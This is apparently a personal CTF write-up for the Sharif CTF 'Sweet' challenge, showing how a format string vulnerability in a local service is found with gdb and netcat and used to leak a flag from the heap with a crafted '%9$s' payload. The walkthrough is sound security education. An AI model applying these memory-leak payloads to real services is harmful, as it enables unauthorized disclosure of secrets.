Hey,

another write-up. It is about the second Sharif CTF exploitation challenge, called Sweet, which was worth 200 points.

Like the previous one, it requires one argument to specify the port number.

Let me ...

# ls
sweet.tar.gz
# tar zxf sweet.tar.gz 
# ls
sweet  sweet.tar.gz
# chmod +x sweet
# ./sweet 8888
ERROR opening flag file!: No such file or directory
# 

mmm, interesting, take a note of this one ;)

# echo HAMIDx9 > flag.txt
# ./sweet 8888

After some testing I saw that it has a FMT (format string) vulnerability on the input. So ...

# nc 127.0.0.1 8888
HAMIDx9
You wrote: HAMIDx9

# nc 127.0.0.1 8888
HAMIDx9%p%p%p
You wrote: HAMIDx90xb777b8900xb777af640x804921c

Ok, it seems I can read any memory location, so my scenario is reading the flag from memory. But where should I read? Let me check the binary:

# gdb ./sweet -q
Reading symbols from /home/hamidx9/developing/sharif-ctf/sweet-ctf/sweet...(no debugging symbols found)...done.
gdb-peda$ pdisass main
Dump of assembler code for function main:
   0x08048ae1 <+0>: push   %ebp
   0x08048ae2 <+1>: mov    %esp,%ebp
[..snip..]
   0x08048b21 <+64>:    movl   $0x1,0x4(%esp)
   0x08048b29 <+72>:    mov    %eax,(%esp)
   0x08048b2c <+75>:    call   0x8048974 <fwrite@plt>
   0x08048b31 <+80>:    movl   $0x1,(%esp)
   0x08048b38 <+87>:    call   0x80489f4 <exit@plt>
   0x08048b3d <+92>:    movl   $0x8049169,(%esp)
   0x08048b44 <+99>:    call   0x8048fb5 <readfile>
   0x08048b49 <+104>:   mov    %eax,%edx
[..snip..]
   0x08048de9 <+776>:   mov    %eax,(%esp)
   0x08048dec <+779>:   call   0x8048964 <close@plt>
   0x08048df1 <+784>:   jmp    0x8048d30 <main+591>
End of assembler dump.
gdb-peda$ x/s 0x8049169
0x8049169:   "flag.txt"

As you can see, readfile takes one parameter, the file name. Analysing the readfile function shows that after reading the flag.txt file it returns the address of the buffer holding the obtained chars in %eax.

So if I set a breakpoint on *main+99 and then step to the next instruction, I have the stored address. Here it is:

gdb-peda$ b *main+99
Breakpoint 1 at 0x8048b44
gdb-peda$ r 8888
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0xb7fb6ff4 --> 0x15ed7c 
ECX: 0xe9c66826 
EDX: 0x2 
ESI: 0x0 
EDI: 0x0 
EBP: 0xbffff308 --> 0xbffff388 --> 0x0 
ESP: 0xbffff200 --> 0x8049169 ("flag.txt")
EIP: 0x8048b44 (<main+99>:  call   0x8048fb5 <readfile>)
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048b31 <main+80>: movl   $0x1,(%esp)
   0x8048b38 <main+87>: call   0x80489f4 <exit@plt>
   0x8048b3d <main+92>: movl   $0x8049169,(%esp)
=> 0x8048b44 <main+99>: call   0x8048fb5 <readfile>
   0x8048b49 <main+104>:    mov    %eax,%edx
   0x8048b4b <main+106>:    mov    $0x804b0c0,%eax
   0x8048b50 <main+111>:    movl   $0x80,0x8(%esp)
   0x8048b58 <main+119>:    mov    %edx,0x4(%esp)
No argument
[------------------------------------stack-------------------------------------]
0000| 0xbffff200 --> 0x8049169 ("flag.txt")
0004| 0xbffff204 --> 0xb7fea562 (movl   $0x0,0x894(%ebx))
0008| 0xbffff208 --> 0xb7fbb000 
0012| 0xbffff20c --> 0x2305e 
0016| 0xbffff210 --> 0xb7ffeff4 --> 0x1cf2c 
0020| 0xbffff214 --> 0xbffff31c --> 0xb7fe0860 --> 0xb7e58000 --> 0x464c457f 
0024| 0xbffff218 --> 0xb7e5be04 --> 0x0 
0028| 0xbffff21c --> 0xb7ffadf8 ("symbol=%s;  lookup in file=%s [%lu]\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x08048b44 in main ()
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x804c170 ("HAMIDx9\n")
EBX: 0xb7fb6ff4 --> 0x15ed7c 
ECX: 0x804c0a0 --> 0x0 
EDX: 0x8 
ESI: 0x0 
EDI: 0x0 
EBP: 0xbffff308 --> 0xbffff388 --> 0x0 
ESP: 0xbffff200 --> 0x8049169 ("flag.txt")
EIP: 0x8048b49 (<main+104>: mov    %eax,%edx)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048b38 <main+87>: call   0x80489f4 <exit@plt>
   0x8048b3d <main+92>: movl   $0x8049169,(%esp)
   0x8048b44 <main+99>: call   0x8048fb5 <readfile>
=> 0x8048b49 <main+104>:    mov    %eax,%edx
   0x8048b4b <main+106>:    mov    $0x804b0c0,%eax
   0x8048b50 <main+111>:    movl   $0x80,0x8(%esp)
   0x8048b58 <main+119>:    mov    %edx,0x4(%esp)
   0x8048b5c <main+123>:    mov    %eax,(%esp)
[------------------------------------stack-------------------------------------]
0000| 0xbffff200 --> 0x8049169 ("flag.txt")
0004| 0xbffff204 --> 0xb7fea562 (movl   $0x0,0x894(%ebx))
0008| 0xbffff208 --> 0xb7fbb000 
0012| 0xbffff20c --> 0x2305e 
0016| 0xbffff210 --> 0xb7ffeff4 --> 0x1cf2c 
0020| 0xbffff214 --> 0xbffff31c --> 0xb7fe0860 --> 0xb7e58000 --> 0x464c457f 
0024| 0xbffff218 --> 0xb7e5be04 --> 0x0 
0028| 0xbffff21c --> 0xb7ffadf8 ("symbol=%s;  lookup in file=%s [%lu]\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048b49 in main ()
gdb-peda$ 

So the address is 0x0804c170. As you can see, if I go further into the readfile function it shows that malloc is used to store the flag.txt contents, so the string is on the heap:

# cat /proc/19563/maps 
08048000-0804a000 r-xp 00000000 08:04 3560883    /home/hamidx9/developing/sharif-ctf/sweet-ctf/sweet
0804a000-0804b000 r--p 00001000 08:04 3560883    /home/hamidx9/developing/sharif-ctf/sweet-ctf/sweet
0804b000-0804c000 rw-p 00002000 08:04 3560883    /home/hamidx9/developing/sharif-ctf/sweet-ctf/sweet
0804c000-0806d000 rw-p 00000000 00:00 0          [heap]
b7e57000-b7e58000 rw-p 00000000 00:00 0 
b7e58000-b7fb4000 r-xp 00000000 08:02 131506     /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fb4000-b7fb5000 ---p 0015c000 08:02 131506     /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fb5000-b7fb7000 r--p 0015c000 08:02 131506     /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fb7000-b7fb8000 rw-p 0015e000 08:02 131506     /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fb8000-b7fbb000 rw-p 00000000 00:00 0 
b7fde000-b7fe1000 rw-p 00000000 00:00 0 
b7fe1000-b7fe2000 r-xp 00000000 00:00 0          [vdso]
b7fe2000-b7ffe000 r-xp 00000000 08:02 131542     /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r--p 0001b000 08:02 131542     /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rw-p 0001c000 08:02 131542     /lib/i386-linux-gnu/ld-2.13.so
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]

Ok, it's time to read the contents of 0x0804c170 through our arbitrary input. First of all I must find the argument offset in the format string vulnerability:

# python -c 'print "AAAA"+".%p"*50' | nc 127.0.0.1 8888
You wrote: AAAA.0xb7fff890.0xb7ffef64.0x804921c.0xbffff0f0.0xbffff2dc.0x2305e.0x804b0c0.0x9b.0x41414141.0x6278302e.0x66666637.0x2e303938.0x37627830.0x66656666.0x302e3436.0x34303878.0x63313239.0x6278302e.0x66666666.0x2e306630.0x66627830.0x32666666.0x302e6364.0x30333278.0x302e6535.0x34303878.0x30633062.0x3978302e.0x78302e62.0x31343134.0x31343134.0x3678302e.0x33383732.0x2e653230.0x36367830.0x36363636.0x302e3733.0x33653278.0x33393330.0x78302e38.0x32363733.0x30333837.0x3678302e.0x36353636.0x2e363636.0x30337830.0x34336532.0x302e3633.0x33343378.0x37383330

So the offset is 9: the 9th %p prints 0x41414141, which is the "AAAA" at the start of our input.

Finally, I read the target memory with the following trick:

# python -c 'print "\x70\xc1\x04\x08"+"%9$s"' | nc 127.0.0.1 8888
[Connection 127.0.0.1:56806]
You wrote: p�HAMIDx9

So there we go ;)

Interesting level, but I still think it was too easy for 200 points.

Regards, HAMIDx9
